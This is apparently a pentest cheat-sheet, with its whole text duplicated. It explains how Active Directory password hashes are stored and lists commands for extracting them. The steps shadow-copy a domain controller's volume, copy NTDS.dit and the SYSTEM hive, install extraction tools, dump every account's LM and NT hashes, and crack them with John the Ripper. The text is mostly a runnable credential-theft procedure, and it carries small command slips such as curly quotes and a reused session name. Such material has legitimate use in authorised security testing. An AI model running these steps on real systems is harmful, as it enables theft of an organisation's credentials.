ddouhine/AD domain offline cracking #pentest

## AD domain offline cracking #pentest
Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.

Extract NTDS/SYSTEM from a domain controller:
    net start vss
    vssadmin create shadow /for=c:
    vssadmin list shadows
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM C:\temp

Pre-requisites installation (on a Kali):
    wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py
    wget http://pkgs.fedoraproject.org/repo/pkgs/libesedb/libesedb-alpha-20120102.tar.gz/198a30c98ca1b3cb46d10a12bef8deaf/libesedb-alpha-20120102.tar.gz
    tar -zxf libesedb-alpha-20120102.tar.gz
    cd libesedb-20120102/
    ./configure && make && sudo make install
    wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
    unzip ntdsxtract_v1_0.zip

Hashes extraction and crack:
    ./esedbexport ntds.dit
    python NTDSXtract 1.0/dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 –passwordhashes hklm_system.sav
    grep -A 2 “Password hashes:” dsusers.results |grep -v “Password hashes” |grep -v 'Record ID'|grep -v “\-\-” |sort|uniq > allHashes
    grep '\$NT\$' allHashes | sed 's/.\(.*\)/\1/' > NTHashes
    grep -v '\$NT\$' allHashes | sed 's/.\(.*\)/\1/' > LMHashes
    john –session=LM LMHashes &
    john –session=LM NTHashes &
	Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
	This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
	The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
	To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.

	Extract NTDS/SYSTEM from a domain controller:
	net start vss
	vssadmin create shadow /for=c:
	vssadmin list shadows
	copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp
	copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM C:\temp

	Pre-requisites installation (on a Kali):
	wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py
	wget http://pkgs.fedoraproject.org/repo/pkgs/libesedb/libesedb-alpha-20120102.tar.gz/198a30c98ca1b3cb46d10a12bef8deaf/libesedb-alpha-20120102.tar.gz
	tar -zxf libesedb-alpha-20120102.tar.gz
	cd libesedb-20120102/
	./configure && make && sudo make install
	wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
	unzip ntdsxtract_v1_0.zip

	Hashes extraction and crack:
	./esedbexport ntds.dit
	python NTDSXtract 1.0/dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 –passwordhashes hklm_system.sav
	grep -A 2 “Password hashes:” dsusers.results \|grep -v “Password hashes” \|grep -v 'Record ID'\|grep -v “\-\-” \|sort\|uniq > allHashes
	grep '\$NT\$' allHashes \| sed 's/.\(.*\)/\1/' > NTHashes
	grep -v '\$NT\$' allHashes \| sed 's/.\(.*\)/\1/' > LMHashes
	john –session=LM LMHashes &
	john –session=LM NTHashes &